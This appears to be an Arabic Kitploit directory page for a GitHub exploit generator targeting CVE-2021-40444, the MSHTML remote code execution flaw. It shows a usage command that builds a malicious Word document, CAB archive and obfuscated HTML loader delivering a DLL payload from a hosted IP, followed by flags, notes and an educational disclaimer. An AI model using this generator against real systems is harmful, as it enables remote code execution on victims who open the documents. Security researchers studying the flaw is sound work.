Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-40444 — مولد استغلال مبني على بايثون لـ CVE-2021-40444 (MSHTML RCE) مع تسليم حمولة مدفوعة بالقوالب عبر مستندات Office ضارة وأرشيفات CAB واستدعاءات HTML/JS مبهمة. | Kitploit
أدوات/GitHubGitHub/h0j3n/cve-2021-40444
توليد الحمولةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةالتعلم والتعليم
GitHubh0j3n/cve-2021-40444

CVE-2021-40444

مولد استغلال مبني على بايثون لـ CVE-2021-40444 (MSHTML RCE) مع تسليم حمولة مدفوعة بالقوالب عبر مستندات Office ضارة وأرشيفات CAB واستدعاءات HTML/JS مبهمة.

عرض المستودع
114منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-40444

الاستخدام

تأكد من تشغيل setup.sh أولاً لأنك ستحتاج إلى بعض المجلدات. بعد تشغيل السكريبت، يجب أن تكون قادرًا على تشغيل gen.py باستخدام المثال التالي:-

root@kitploit:~
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx 
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf 
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

ملاحظات

  1. سيكون موقع http.server في مجلد web. سيحتوي هذا المجلد على 3 ملفات:-
  • .cab
  • .html
  • .docx

بدون تفصيل

بدون تفصيل

مع التفصيل

مع التفصيل

إخلاء مسؤولية

هذا المستودع مخصص للأغراض التعليمية فقط وليس المقصود استخدامه في الخارج بنية سيئة. أي استخدام غير قانوني لهذا المستودع يتحمل المستخدم مسؤوليته ومخاطره بالكامل.

المراجع

  1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
  3. https://github.com/klezVirus/CVE-2021-40444
  4. https://github.com/lockedbyte/CVE-2021-40444
  5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
  6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
  7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
  8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
  9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
  11. https://blog.sunggwanchoi.com/remote-template-injection/
  12. https://youtube.com/watch?v=dgdx3QqPCuA
  13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution
تنزيل الأداة